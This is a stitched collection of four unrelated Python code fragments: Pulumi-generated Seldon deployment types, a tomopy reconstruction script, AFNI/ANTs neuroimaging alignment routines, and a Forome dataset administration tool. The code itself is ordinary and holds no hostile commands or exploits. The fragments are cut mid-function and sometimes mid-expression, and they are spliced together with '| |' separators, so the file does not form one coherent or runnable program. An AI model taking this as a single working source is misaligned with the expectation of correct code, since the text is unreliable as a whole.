name: Optional[str] = None,
parameters: Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenParameters']] = None,
service_account_name: Optional[str] = None,
type: Optional[str] = None):
"""
:param 'SeldonDeploymentSpecPredictorsGraphChildrenChildrenLoggerArgs' logger: Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
if children is not None:
pulumi.set(__self__, "children", children)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if env_secret_ref_name is not None:
pulumi.set(__self__, "env_secret_ref_name", env_secret_ref_name)
if implementation is not None:
pulumi.set(__self__, "implementation", implementation)
if logger is not None:
pulumi.set(__self__, "logger", logger)
if methods is not None:
pulumi.set(__self__, "methods", methods)
if model_uri is not None:
pulumi.set(__self__, "model_uri", model_uri)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def children(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenChildren']]:
return pulumi.get(self, "children")
@property
@pulumi.getter
def endpoint(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenEndpoint']:
return pulumi.get(self, "endpoint")
@property
@pulumi.getter(name="envSecretRefName")
def env_secret_ref_name(self) -> Optional[str]:
return pulumi.get(self, "env_secret_ref_name")
@property
@pulumi.getter
def implementation(self) -> Optional[str]:
return pulumi.get(self, "implementation")
@property
@pulumi.getter
def logger(self) -> Optional['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenLogger']:
"""
Request/response payload logging. v2alpha1 feature that is added to v1 for backwards compatibility while v1 is the storage version.
"""
return pulumi.get(self, "logger")
@property
@pulumi.getter
def methods(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "methods")
@property
@pulumi.getter(name="modelUri")
def model_uri(self) -> Optional[str]:
return pulumi.get(self, "model_uri")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> Optional[Sequence['outputs.SeldonDeploymentSpecPredictorsGraphChildrenChildrenParameters']]:
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[str]:
return pulumi.get(self, "service_account_name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsGraphChildrenChildrenChildren(dict):
def __init__(__self__, *,
| |
from __future__ import print_function
import time
import h5py
import numpy as np
import numexpr as ne
import skimage.transform as st
import os
import sys
import scipy.ndimage.filters as snf
import concurrent.futures as cf
import warnings
import importlib
import xlrd # for importing excel spreadsheets
from ast import literal_eval # For converting string to tuple
import glob
try:
import tomopy
from tomopy.util import mproc
except:
print("warning: tomopy is not available")
try:
import dxchange
except:
print("warning: dxchange is not available")
try:
importlib.import_module('pyF3D')
import pyF3D
except ImportError:
print("Warning: pyF3D not available")
#run this from the command line:
#python tomopy832.py
#it requires a separate file, which contains at minimum a list of filenames
#on separate lines. Default name of this file is input832.txt, but you can use any
#filename and run from the commandline as
#python tomopy832.py yourinputfile.txt
#If desired, on each line (separated by spaces) you can
#include parameters to override the defaults.
#to do this you need pairs, first the name of the variable, then the desired value
#For True/False, use 1/0.
#You can generate these input files in excel, in which case use tab-separated
#(or space separated). Some input overrides require multiple values,
#these should be comma-separated (with no spaces). Example is sinoused
#which would be e.g. 500,510,1 to get slices 500 through 509. For sinoused,
#you can use first value -1 and second value number of slices to get that number
#of slices from the middle of the stack.
#an example of the contents of the input file look like this:
#20150820_162025_Mvesparium_20948-131_pieceA_10x_x00y00.h5 cor 1196 sinoused "-1,10,1" doPhaseRetrieval 0 outputFilename c1196.0
#20150820_162025_Mvesparium_20948-131_pieceA_10x_x00y00.h5 cor 1196.5 sinoused "-1,10,1" doPhaseRetrieval 0 outputFilename c1196.5
#this was generated in excel and saved as txt tab separated, so the quotes were
#added automatically by excel. Note also that for parameters expecting strings as
#input (outputFilename for example), the program will choke if you put in a number.
#if cor is not defined in the parameters file, automated cor detection will happen
#chunk_proj and chunk_sino handle memory management. If you are running out of memory, make one or both of those smaller.
slice_dir = {
'remove_outlier1d': 'sino',
'remove_outlier2d': 'proj',
'normalize_nf': 'sino',
'normalize': 'both',
'minus_log': 'both',
'beam_hardening': 'both',
'remove_stripe_fw': 'sino',
'remove_stripe_ti': 'sino',
'remove_stripe_sf': 'sino',
'do_360_to_180': 'sino',
'correcttilt': 'proj',
'phase_retrieval': 'proj',
'recon_mask': 'sino',
'polar_ring': 'sino',
'bilateral_filter': 'both',
'castTo8bit': 'both',
'write_output': 'both'
}
#to profile memory, uncomment the following line
#and then run program from command line as
#python -m memory_profiler tomopy832.py
#(you have to have memory_profiler installed)
#@profile
def recon(
filename,
inputPath = './',
outputPath = None,
outputFilename = None,
doOutliers1D = False, # outlier removal in 1d (along sinogram columns)
outlier_diff1D = 750, # difference between good data and outlier data (outlier removal)
outlier_size1D = 3, # radius around each pixel to look for outliers (outlier removal)
doOutliers2D = False, # outlier removal, standard 2d on each projection
outlier_diff2D = 750, # difference between good data and outlier data (outlier removal)
outlier_size2D = 3, # radius around each pixel to look for outliers (outlier removal)
doFWringremoval = True, # Fourier-wavelet ring removal
doTIringremoval = False, # Titarenko ring removal
doSFringremoval = False, # Smoothing filter ring removal
ringSigma = 3, # damping parameter in Fourier space (Fourier-wavelet ring removal)
ringLevel = 8, # number of wavelet transform levels (Fourier-wavelet ring removal)
ringWavelet = 'db5', # type of wavelet filter (Fourier-wavelet ring removal)
ringNBlock = 0, # used in Titarenko ring removal (doTIringremoval)
ringAlpha = 1.5, # used in Titarenko ring removal (doTIringremoval)
ringSize = 5, # used in smoothing filter ring removal (doSFringremoval)
doPhaseRetrieval = False, # phase retrieval
alphaReg = 0.0002, # smaller = smoother (used for phase retrieval)
propagation_dist = 75, # sample-to-scintillator distance (phase retrieval)
kev = 24, # energy level (phase retrieval)
butterworth_cutoff = 0.25, #0.1 would be very smooth, 0.4 would be very grainy (reconstruction)
butterworth_order = 2, # for reconstruction
doTranslationCorrection = False, # correct for linear drift during scan
xshift = 0, # undesired dx transation correction (from 0 degree to 180 degree proj)
yshift = 0, # undesired dy transation correction (from 0 degree to 180 degree proj)
doPolarRing = False, # ring removal
Rarc=30, # min angle needed to be considered ring artifact (ring removal)
Rmaxwidth=100, # max width of rings to be filtered (ring removal)
Rtmax=3000.0, # max portion of image to filter (ring removal)
Rthr=3000.0, # max value of offset due to ring artifact (ring removal)
Rtmin=-3000.0, # min value of image to filter (ring removal)
cor=None, # center of rotation (float). If not used then cor will be detected automatically
corFunction = 'pc', # center of rotation function to use - can be 'pc', 'vo', or 'nm'
voInd = None, # index of slice to use for cor search (vo)
voSMin = -40, # min radius for searching in sinogram (vo)
voSMax = 40, # max radius for searching in sinogram (vo)
voSRad = 10, # search radius (vo)
voStep = 0.5, # search step (vo)
voRatio = 2.0, # ratio of field-of-view and object size (vo)
voDrop = 20, # drop lines around vertical center of mask (vo)
nmInd = None, # index of slice to use for cor search (nm)
nmInit = None, # initial guess for center (nm)
nmTol = 0.5, # desired sub-pixel accuracy (nm)
nmMask = True, # if True, limits analysis to circular region (nm)
nmRatio = 1.0, # ratio of radius of circular mask to edge of reconstructed image (nm)
nmSinoOrder = False, # if True, analyzes in sinogram space. If False, analyzes in radiograph space
use360to180 = False, # use 360 to 180 conversion
doBilateralFilter = False, # if True, uses bilateral filter on image just before write step # NOTE: image will be converted to 8bit if it is not already
bilateral_srad = 3, # spatial radius for bilateral filter (image will be converted to 8bit if not already)
bilateral_rrad = 30, # range radius for bilateral filter (image will be converted to 8bit if not already)
castTo8bit = False, # convert data to 8bit before writing
cast8bit_min=-10, # min value if converting to 8bit
cast8bit_max=30, # max value if converting to 8bit
useNormalize_nf = False, # normalize based on background intensity (nf)
chunk_proj = 100, # chunk size in projection direction
chunk_sino = 100, # chunk size in sinogram direction
npad = None, # amount to pad data before reconstruction
projused = None, #should be slicing in projection dimension (start,end,step)
sinoused = None, #should be sliceing in sinogram dimension (start,end,step). If first value is negative, it takes the number of slices from the second value in the middle of the stack.
correcttilt = 0, #tilt dataset
tiltcenter_slice = None, # tilt center (x direction)
tiltcenter_det = None, # tilt center (y direction)
angle_offset = 0, #this is the angle offset from our default (270) so that tomopy yields output in the same orientation as previous software (Octopus)
anglelist = None, #if not set, will assume evenly spaced angles which will be calculated by the angular range and number of angles found in the file. if set to -1, will read individual angles from each image. alternatively, a list of angles can be passed.
doBeamHardening = False, #turn on beam hardening correction, based on "Correction for beam hardening in computed tomography", <NAME>, 1979 Phys. Med. Biol. 24 81
BeamHardeningCoefficients = None, #6 values, tomo = a0 + a1*tomo + a2*tomo^2 + a3*tomo^3 + a4*tomo^4 + a5*tomo^5
projIgnoreList = None, #projections to be ignored in the reconstruction (for simplicity in the code, they will not be removed and will be processed as all other projections but will be set to zero absorption right before reconstruction.
*args, **kwargs):
start_time = time.time()
print("Start {} at:".format(filename)+time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.localtime()))
outputPath = inputPath if outputPath is None else outputPath
outputFilename = filename if outputFilename is None else outputFilename
outputFilename = outputFilename.replace('.h5','')
tempfilenames = [outputPath+'tmp0.h5',outputPath+'tmp1.h5']
filenametowrite = outputPath+'/rec'+filename.strip(".h5")+'/'+outputFilename
#filenametowrite = outputPath+'/rec'+filename+'/'+outputFilename
print("cleaning up previous temp files", end="")
for tmpfile in tempfilenames:
try:
os.remove(tmpfile)
except OSError:
pass
print(", reading metadata")
datafile = h5py.File(inputPath+filename, 'r')
gdata = dict(dxchange.reader._find_dataset_group(datafile).attrs)
pxsize = float(gdata['pxsize'])/10 # /10 to | |
--float 1 \
-r {sanitized_base} -i {in_file} -d {dim} --input-image-type {image_type} \
-o {outputs['out_file']} --interpolation {interp} \
{' '.join(xform_cmds)}")
if is_bucket:
io.change_dim_order(in_file, dim_order='bucket', method='afni') # Change in_file back to bucket
io.change_dim_order(outputs['out_file'], dim_order='bucket', method='afni') # The output should follow input
if is_temp:
os.remove(sanitized_base)
# Make sure out_file is of the same space as base_file
io.change_space(outputs['out_file'], space=io.get_space(base_file), method='nibabel') # Causion: Cannot use "afni" here...
# Copy afni subbrick labels
# This must go last because io.change_space(method='nibabel') will recreate the volume without afni metadata
try:
afni.set_brick_labels(outputs['out_file'], afni.get_brick_labels(in_file))
except: # TODO: In case the file doesn't have labels
pass
all_finished(outputs)
return outputs
def ants2afni_affine(ants_affine, afni_affine):
raise NotImplementedError
def afni2ants_affine(afni_affine, ants_affine):
raise NotImplementedError
def ants2afni_warp(ants_warp, afni_warp):
raise NotImplementedError
def afni2ants_warp(afni_warp, ants_warp):
raise NotImplementedError
class Transform(object):
def __init__(self, transforms, base_file=None, source_file=None):
'''
Parameters
----------
transforms : list of (fwd_xform, inv_xform) pairs
If only one transform (rather than a tuple) is given, it is assumed to be
the fwd_xform, and "fwd_xform -I" is treated as inv_xform.
Transform chain should be specified using "pulling" convention, i.e.,
last transform applies first (as in AFNI and ANTs for volumes).
Each transform should also be a "pulling" transform from moving to fixed
as generated by AFNI and ANTs.
Transforms should be specified by their file names, and inverse transforms
can be specified as "*_0GenericAffine.mat -I" (esp. for affine).
'''
# Add inverse transform automatically for singleton (assumed linear)
self.transforms = [(t, f"{t} -I") if isinstance(t, str) else tuple(t) for t in transforms]
self.base_file = base_file
self.source_file = source_file
def inverse(self):
transforms = [transform[::-1] for transform in self.transforms[::-1]]
return self.__class__(transforms, base_file=self.source_file, source_file=self.base_file)
def rebase(self, base_file):
return self.__class__(self.transforms, base_file=base_file, source_file=self.source_file)
def replace_path(self, p):
f = lambda fname: path.join(p, path.basename(fname))
self.transforms = [(f(fwd), f(inv)) for fwd, inv in self.transforms]
self.base_file = f(self.base_file)
self.source_file = f(self.source_file)
def to_json(self, fname):
with open(fname, 'w') as json_file:
json.dump(self.__dict__, json_file, indent=4)
@classmethod
def from_json(cls, fname, replace_path=False):
'''
Parameters
----------
replace_path: bool
Replace path of the transform files according to json file path
'''
with open(fname) as json_file:
data = json.load(json_file)
inst = cls(data['transforms'], base_file=data['base_file'], source_file=data['source_file'])
if replace_path:
inst.replace_path(path.dirname(fname))
return inst
def __repr__(self):
source = path.basename(self.source_file) if self.source_file is not None else 'unknown'
base = path.basename(self.base_file) if self.base_file is not None else 'unknown'
return f"<{self.__class__.__name__} | from {source} to {base} >"
def apply(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, forward transform (from input/moving to base/fixed)
'''
transforms = [xform_pair[0] for xform_pair in self.transforms]
base_file = self.base_file if base_file is None else base_file
return apply_transforms(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
def apply_inverse(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, inverse transform (from base/fixed to input/moving)
'''
transforms = [xform_pair[1] for xform_pair in self.transforms[::-1]] # Inverse
base_file = self.source_file if base_file is None else base_file
return apply_transforms(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
class ANTsTransform(Transform):
@classmethod
def from_align_ants(cls, outputs):
transforms = [(path.realpath(outputs['fwd_warp']), path.realpath(outputs['inv_warp'])),
(path.realpath(outputs['fwd_affine']), path.realpath(outputs['fwd_affine'])+' -I')]
return cls(transforms, base_file=path.realpath(outputs['base_file']), source_file=path.realpath(outputs['in_file']))
def apply(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, forward transform (from input/moving to base/fixed)
'''
transforms = [xform_pair[0] for xform_pair in self.transforms]
base_file = self.base_file if base_file is None else base_file
return apply_ants(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
def apply_inverse(self, in_file, out_file, base_file=None, interp=None, **kwargs):
'''
For volumes, inverse transform (from base/fixed to input/moving)
'''
transforms = [xform_pair[1] for xform_pair in self.transforms[::-1]] # Inverse
base_file = self.source_file if base_file is None else base_file
return apply_ants(transforms, base_file, in_file, out_file, interp=interp, **kwargs)
def apply_to_points(self, in_file, out_file):
'''
For list of points, forward transform (from input/moving to base/fixed)
Parameters
----------
in_file, out_file : `*.csv` file with "x,y,z,t" header line.
'''
return self.apply_inverse(in_file, out_file, base_file=None)
def apply_inverse_to_points(self, in_file, out_file):
'''
For list of points, inverse transform (from base/fixed to input/moving)
Parameters
----------
in_file, out_file : `*.csv` file with "x,y,z,t" header line.
'''
return self.apply(in_file, out_file, base_file=None)
def _apply_transform_to_xyz(self, xyz, convention='DICOM', transform='forward'):
'''
Parameters
----------
xyz : Nx3 array
convention : 'DICOM' | 'NIFTI'
transform : 'forward' | 'inverse'
'''
temp_file = utils.temp_prefix(suffix='.csv')
if convention.upper() in ['NIFTI', 'LPI', 'RAS+']:
xyz = xyz * [-1, -1, 1] # To DICOM or RAI or LPS+
np.savetxt(temp_file, np.c_[xyz, np.zeros(xyz.shape[0])], delimiter=',', header='x,y,z,t', comments='')
if transform == 'forward':
self.apply_to_points(temp_file, temp_file)
elif transform == 'inverse':
self.apply_inverse_to_points(temp_file, temp_file)
xyz = np.loadtxt(temp_file, skiprows=1, delimiter=',')[:,:3]
if convention.upper() in ['NIFTI', 'LPI', 'RAS+']:
xyz = xyz * [-1, -1, 1] # Back to NIFTI
os.remove(temp_file)
return xyz
def apply_to_xyz(self, xyz, convention='DICOM'):
'''
Parameters
----------
xyz : Nx3 array
convention : 'DICOM' | 'NIFTI'
'''
return self._apply_transform_to_xyz(xyz, convention=convention, transform='forward')
def apply_inverse_to_xyz(self, xyz, convention='DICOM'):
'''
Parameters
----------
xyz : Nx3 array
convention : 'DICOM' | 'NIFTI'
'''
return self._apply_transform_to_xyz(xyz, convention=convention, transform='inverse')
def align_anat(base_file, in_file, out_file, strip=None, N4=None, init_shift=None, init_rotate=None, init_xform=None,
method=None, cost=None, n_params=None, interp=None, max_rotate=None, max_shift=None,
emask=None, save_weight=None):
'''
emask : fname
Mask to exclude from analysis.
'''
def parse_cost(output):
pattern = re.compile(r'\+\+ allcost output: final fine #0')
k = 0
while k < len(output):
match = pattern.match(output[k])
k += 1
if match:
cost = {}
while True:
match = re.search('(\S+)\s+= (\S+)', output[k])
k += 1
if match:
cost[match.group(1)] = float(match.group(2))
else:
break
return cost
if method is None:
method = '3dallineate'
else:
method = method.lower()
assert(method in ['3dallineate', 'align_epi_anat'])
if cost is None:
cost = 'lpa'
elif cost == 'within':
cost = 'lpa'
elif cost == 'cross':
cost = 'lpc'
elif cost == 'edge':
cost = 'lpa -edge'
if method != 'align_epi_anat':
raise ValueError('cost="edge" only works with method="align_epi_anat"')
if n_params is None:
n_params = 'affine_general'
elif n_params in ['affine', 12]:
n_params = 'affine_general'
elif n_params in ['rigid', 6]:
n_params = 'shift_rotate'
if interp is None:
interp = 'wsinc5'
init_shift_cmd = ''
if init_shift is None:
if init_rotate is None and max_shift is None:
init_shift_cmd = '-cmass'
if max_rotate is None:
max_rotate = 90
temp_dir = utils.temp_folder()
prefix, ext = afni.split_out_file(out_file)
outputs = {
'out_file': f"{prefix}{ext}",
'xform_file': f"{prefix}.aff12.1D",
'cost': None,
}
if save_weight is not None:
outputs['weight_file'] = save_weight if isinstance(save_weight, six.string_types) else f"{prefix}.autoweight{ext}"
pc = utils.PooledCaller()
# Strip skull
if strip is None:
strip = True
if isinstance(strip, (str, bool)):
strip = [strip]
if not set(strip).isdisjoint({True, 'both', 'base', 'template'}):
pc.run(skullstrip, base_file, f"{temp_dir}/base_ns.nii")
else:
pc.run(f"3dcopy {base_file} {temp_dir}/base_ns.nii")
if not set(strip).isdisjoint({True, 'both', 'source', 'src', 'input', 'in'}):
pc.run(skullstrip, in_file, f"{temp_dir}/in_ns.nii")
else:
pc.run(f"3dcopy {in_file} {temp_dir}/in_ns.nii")
pc.wait()
# Correct bias field using N4 method in ANTs
# This may potentially enhance the performance of some cost functions.
# Consider trying 6 dof rigid body transform instead of 12 dof affine.
if N4 is None:
N4 = False
if N4 and shutil.which('N4BiasFieldCorrection') is None:
raise ValueError('>> ANTs is not (correctly) installed. So cannot use N4BiasFieldCorrection. Set N4=None.')
if isinstance(N4, (str, bool)):
N4 = [N4]
if not set(N4).isdisjoint({True, 'both', 'base', 'template'}):
pc.run(f"N4BiasFieldCorrection -d 3 -i {temp_dir}/base_ns.nii -s 2 -o \
'[{temp_dir}/base_ns.nii,{temp_dir}/base_bias.nii]'")
if not set(N4).isdisjoint({True, 'source', 'input', 'in'}):
pc.run(f"N4BiasFieldCorrection -d 3 -i {temp_dir}/in_ns.nii -s 2 -o \
'[{temp_dir}/in_ns.nii,{temp_dir}/in_bias.nii]'")
pc.wait()
# Apply initial (manual) alignment and extract the parameters
transforms = []
if init_rotate is not None:
if init_rotate:
init_mat = nudge_cmd2mat(init_rotate, f"{temp_dir}/in_ns.nii")
init_xform = f"{temp_dir}/init.aff12.1D"
io.write_affine(init_xform, init_mat)
if init_xform is not None:
apply_transforms(init_xform, f"{temp_dir}/base_ns.nii",
f"{temp_dir}/in_ns.nii", f"{temp_dir}/in_ns.nii")
transforms.insert(0, init_xform)
# Estimate best alignment parameters
if method == '3dallineate':
res = utils.run(f'''3dAllineate -final {interp} -cost {cost} -allcost -warp {n_params} \
{init_shift_cmd} \
-maxrot {max_rotate} {'' if max_shift is None else f'-maxshf {max_shift}'} \
-base {temp_dir}/base_ns.nii -input {temp_dir}/in_ns.nii \
-autoweight -source_automask+2 -twobest 11 -fineblur 1 \
{f'-emask {emask}' if emask is not None else ''} \
{f'-wtprefix {outputs["weight_file"]}' if save_weight is not None else ''} \
-1Dmatrix_save {temp_dir}/in2base.aff12.1D \
-prefix {temp_dir}/out_ns.nii -overwrite''')
transforms.insert(0, f"{temp_dir}/in2base.aff12.1D")
outputs['cost'] = parse_cost(res['output'])
elif method == 'align_epi_anat':
pass
# Apply all transforms at once
apply_transforms(transforms, base_file, in_file, outputs['out_file'], interp=interp, save_xform=outputs['xform_file'])
shutil.rmtree(temp_dir)
all_finished(outputs)
return outputs
def align_S2E(base_file, suma_dir, out_file=None, **kwargs):
surf_vol = afni.get_surf_vol(suma_dir)
if out_file is None:
out_dir, prefix, ext = afni.split_out_file(base_file, split_path=True, trailing_slash=True)
out_file = f"{out_dir}SurfVol_Alnd_Exp{ext}"
out_dir, prefix, ext = afni.split_out_file(out_file, split_path=True, trailing_slash=True)
outputs = align_anat(base_file, surf_vol, out_file, **kwargs)
outputs['script_file'] = f"{out_dir}run_suma"
spec_file | |
# Copyright (c) 2019. Partners HealthCare and other members of
# Forome Association
#
# Developed by <NAME> based on contributions by <NAME>,
# <NAME>, <NAME> and other members of Division of
# Genetics, Brigham and Women's Hospital
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys, codecs, json, os, shutil, re, time, logging
from argparse import ArgumentParser
from datetime import datetime
from forome_tools.json_conf import loadJSonConfig, loadCommentedJSon
from forome_tools.inventory import loadDatasetInventory
from app.prepare.druid_adm import DruidAdmin
from app.prepare.html_report import reportDS
from app.prepare.doc_works import prepareDocDir
from app.prepare.ds_create import (createDS,
portionFavorDruidPush, pushDruidDataset)
from app.config.solutions import readySolutions
from app.model.mongo_db import MongoConnector
from app.model.dir_entry import DirDSEntry
from app.model.ds_favor import FavorStorageAgent
#===============================================
sID_Pattern = re.compile('^\\S+$', re.U)
def checkDSName(name, kind):
global sID_Pattern
if not sID_Pattern.match(name) or not name[0].isalpha():
print("Incorrect dataset name:", name, file = sys.stderr)
assert False
if kind == "ws":
if name.lower().startswith("xl_"):
print("Improper WS name:", name, file = sys.stderr)
print("(Should not have prefix XL_)", file = sys.stderr)
assert False
elif kind == "xl":
if not name.lower().startswith("xl_"):
print("Improper XL-dataset name:", name, file = sys.stderr)
print("(Should have prefix XL_ or xl_)", file = sys.stderr)
assert False
else:
print("Wrong dataset kind:", kind)
assert False
#===============================================
def createDataSet(app_config, ds_entry, force_drop, druid_adm,
report_lines, no_druid_push = False):
readySolutions()
if not ds_entry.getSource():
print("Improper creation datset", ds_entry.getName(), ": no source")
sys.exit()
vault_dir = app_config["data-vault"]
if force_drop:
dropDataSet(app_config, ds_entry, druid_adm, True)
if not os.path.isdir(vault_dir):
os.mkdir(vault_dir)
print("Create (empty) vault directory:", vault_dir, file = sys.stderr)
checkDSName(ds_entry.getName(), ds_entry.getDSKind())
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
if os.path.exists(ds_dir):
print("Dataset exists:", ds_dir, file = sys.stderr)
assert False
os.mkdir(ds_dir)
mongo_conn = MongoConnector(app_config["mongo-db"],
app_config.get("mongo-host"), app_config.get("mongo-port"))
createDS(ds_dir, mongo_conn, druid_adm,
ds_entry.getName(), ds_entry.getSource(), ds_entry.getDSKind(),
ds_entry.getInv(), report_lines, no_druid_push)
mongo_conn.close()
#===============================================
def pushDruid(app_config, ds_entry, druid_adm):
vault_dir = app_config["data-vault"]
if not os.path.isdir(vault_dir):
print("No vault directory:", vault_dir, file = sys.stderr)
assert False
if ds_entry.getDSKind() != "xl":
print("Druid dataset %s has unexpected kind %s" %
(ds_entry.getName(), ds_entry.getDSKind()),
file = sys.stderr)
sys.exit()
checkDSName(ds_entry.getName(), "xl")
druid_datasets = druid_adm.listDatasets()
if ds_entry.getName() in druid_datasets:
druid_adm.dropDataset(ds_entry.getName())
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
is_ok = pushDruidDataset(ds_dir, druid_adm, ds_entry.getName())
if is_ok:
print("Druid dataset %s pushed" % ds_entry.getName())
else:
print("Process failed")
#===============================================
def _dropDruidDataset(druid_adm, ds_name, calm_mode = False):
if calm_mode:
druid_datasets = druid_adm.listDatasets()
else:
druid_datasets = [ds_name]
if ds_name in druid_datasets:
druid_adm.dropDataset(ds_name)
elif not calm_mode:
print("No dataset in Druid to drop:", ds_name)
#===============================================
def dropDataSet(app_config, ds_entry, druid_adm, calm_mode):
assert ds_entry.getDSKind() in ("ws", "xl"), (
f"Missing ds kind: {ds_entry.getDSKind()}")
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
if ds_entry.getDSKind() == "xl":
_dropDruidDataset(druid_adm, ds_entry.getName(), calm_mode)
if not os.path.exists(ds_dir):
if not calm_mode:
print("No dataset to drop:", ds_dir)
return
shutil.rmtree(ds_dir)
print("Dataset droped:", ds_dir)
#===============================================
def pushDoc(app_config, ds_entry):
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/" + ds_entry.getName())
with open(ds_dir + "/dsinfo.json",
"r", encoding = "utf-8") as inp:
ds_info = json.loads(inp.read())
ds_doc_dir = ds_dir + "/doc"
ds_info["doc"] = prepareDocDir(ds_doc_dir, ds_entry.getInv(), reset = True)
mongo_conn = MongoConnector(app_config["mongo-db"],
app_config.get("mongo-host"), app_config.get("mongo-port"))
mongo_agent = mongo_conn.getDSAgent(ds_info["name"], ds_info["kind"])
with open(ds_dir + "/dsinfo.json", "w", encoding = "utf-8") as outp:
print(json.dumps(ds_info, sort_keys = True, indent = 4),
file = outp)
with open(ds_doc_dir + "/info.html", "w", encoding = "utf-8") as outp:
reportDS(outp, ds_info, mongo_agent)
mongo_conn.close()
print("Re-doc complete:", ds_dir)
#===============================================
def prepareFavorStorage(app_config):
portion_size, portion_fetch = app_config["favor-portions"]
return FavorStorageAgent(app_config["favor-url"],
portion_size, portion_fetch)
#===============================================
def initFavor(app_config, druid_adm, report_lines):
readySolutions()
vault_dir = app_config["data-vault"]
if not os.path.isdir(vault_dir):
os.mkdir(vault_dir)
print("Create (empty) vault directory:", vault_dir, file = sys.stderr)
ds_dir = os.path.abspath(vault_dir + "/xl_FAVOR")
if os.path.exists(ds_dir):
print("Dataset exists:", ds_dir, file = sys.stderr)
assert False
os.mkdir(ds_dir)
mongo_conn = MongoConnector(app_config["mongo-db"],
app_config.get("mongo-host"), app_config.get("mongo-port"))
createDS(ds_dir, mongo_conn, druid_adm,
"xl_FAVOR", None, "xl", report_lines = report_lines,
favor_storage = prepareFavorStorage(app_config))
mongo_conn.close()
#===============================================
def dropFavor(app_config, druid_adm, report_lines):
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/xl_FAVOR")
if not os.path.exists(ds_dir):
print("No dataset to drop:", ds_dir)
return
shutil.rmtree(ds_dir)
print("Dataset droped:", ds_dir)
#===============================================
def portionFavor(app_config, druid_adm, portion_no, report_lines,
inside_mode = False):
favor_storage = prepareFavorStorage(app_config)
if not inside_mode:
print("Favor portions:", favor_storage.getPortionCount())
print("Push portion", portion_no)
vault_dir = app_config["data-vault"]
ds_dir = os.path.abspath(vault_dir + "/xl_FAVOR")
portionFavorDruidPush(ds_dir, druid_adm, favor_storage, portion_no)
print("Done portion", portion_no)
#===============================================
def ftuneFavor(app_config, druid_adm, report_lines):
vault_dir = app_config["data-vault"]
ds_name = "xl_FAVOR"
ds_dir = os.path.abspath(vault_dir + "/" + ds_name)
with open(ds_dir + "/dsinfo.json",
"r", encoding = "utf-8") as inp:
ds_info = json.loads(inp.read())
ds_info["total"] = druid_adm.mineTotal(ds_name)
for funit_entry in ds_info["flt_schema"]:
if funit_entry["kind"] == "enum":
variants = druid_adm.mineEnumVariants(
ds_name, funit_entry["name"])
print("Unit update: %s %d -> %d" % (funit_entry["name"],
len(funit_entry["variants"]), len(variants)))
funit_entry["variants"] = variants
with open(ds_dir + "/~dsinfo.json", "w", encoding = "utf-8") as outp:
print(json.dumps(ds_info, sort_keys = True, indent = 4),
file = outp)
os.rename(ds_dir + "/dsinfo.json", ds_dir + "/dsinfo.json~")
os.rename(ds_dir + "/~dsinfo.json", ds_dir + "/dsinfo.json")
print("Filter variants tuning done")
#===============================================
def _favorBatch(app_config, druid_adm, batch_dir, report_lines):
assert os.path.isdir(batch_dir), (
"Bad batch directory: " + batch_dir)
if os.path.exists(batch_dir + "/stop"):
print("STOPPED")
with open(batch_dir + "/log", "at") as outp:
print("%s: STOPED" % str(datetime.now()), file = outp)
return False
assert os.path.exists(batch_dir + "/loaded.txt"), (
"No file:" + batch_dir + "/loaded.txt")
loaded_idxs = set()
with open(batch_dir + "/loaded.txt", "rt") as inp:
for line_idx, line in enumerate(inp):
idx_str = line.strip()
assert idx_str.isdigit(), (
"loaded.txt at line %d: bad line" % (line_idx + 1))
idx = int(idx_str)
assert idx not in loaded_idxs, (
"loaded.txt at line %d: duplicated idx %d"
% (line_idx + 1, idx))
loaded_idxs.add(idx)
favor_storage = prepareFavorStorage(app_config)
p_count = favor_storage.getPortionCount()
next_portion = None
for idx in range(p_count - 1):
if idx not in loaded_idxs:
next_portion = idx
break
if next_portion is None:
print("MISSION COMPLETE (check last portion", p_count - 1)
with open(batch_dir + "/log", "at") as outp:
print("%s: COMPLETE" % str(datetime.now()), file = outp)
return False
with open(batch_dir + "/log", "at") as outp:
print("%s: Push portion %d" % (str(datetime.now()), next_portion),
file = outp)
portionFavor(app_config, druid_adm, next_portion, report_lines, True)
loaded_idxs.add(next_portion)
with open(batch_dir + "/~loaded.txt", "wt") as outp:
for idx in sorted(loaded_idxs):
print(idx, file = outp)
os.rename(batch_dir + "/loaded.txt", batch_dir + "/loaded.txt~")
